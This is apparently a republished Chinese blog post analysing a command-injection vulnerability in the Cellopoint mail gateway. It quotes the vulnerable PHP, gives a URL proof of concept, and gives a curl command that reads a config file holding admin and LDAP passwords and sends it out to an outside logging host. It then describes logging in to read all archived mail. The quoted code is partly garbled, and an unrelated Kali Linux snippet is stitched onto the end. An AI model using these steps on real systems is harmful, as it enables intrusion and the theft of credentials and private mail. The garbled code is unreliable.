这篇文章将为大家详细讲解有关cellopoint邮件网关任意命令执行漏洞方示例分析,文章内容质量较高,因此小编分享给大家做个参考,希望大家阅读完这篇文章后对相关知识有一定的了解。zend 解密
测试发现reporter目录下的gw_x_vrfy_n_test.php文件存在一处命令执行:$email = $_GET[“email”];$vrfy = $_GET[“vrfy”];$file = (isset($_GET[“file”]) ? $_GET[“file”] : $ini_default);$debugFile = “/tmp/vrfy-test.err”;$cmd = $GLOBALS[“TopFileRoot”] . “smtpd/celloauth -v ” . . ” -n $vrfy -d 2> debugFile”;exec($cmd, $output, $ret);$lines = @file($debugFile);URL内构造POC:gw_x_vrfy_n_test.php?vrfy=;$cmd;的方式可以利用该漏洞执行命令(nobody权限)。排查发现/usr/local/mozart/smtpd/default.ini文件保存各项邮件管理员、ldap等账户密码信息。构造以下sed命令(通过sed命令读取目标文件单行内容):curl%20-k%20https:/免费云主机域名/cloudeye.me/?info=$(sed%20-n%203p%20/usr/local/mozart/smtpd/default.ini),通过查阅远端服务器(例如cloudeye.me)的web日志信息,回显获取到default.ini文件内容,得到邮件归档管理员admin的口令或者配置的ldap密码,访问 $ip/report/login.php 登陆查阅全部邮件内容。关于cellopoint邮件网关任意命令执行漏洞方示例分析就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。
1.2 Kali与Debian的关系Kali Linux分发版是基于Debian测试版的。因此,Kali Linux中的大多数软件包直接来自于Debian的软件仓库。虽然Kali Linux很大程度上依赖于Debian,但在某种意义上讲,我们也是完全独立自主的…
免责声明:本站发布的图片视频文字,以转载和分享为主,文章观点不代表本站立场,本站不承担相关法律责任;如果涉及侵权请联系邮箱:360163164@qq.com举报,并提供相关证据,经查实将立刻删除涉嫌侵权内容。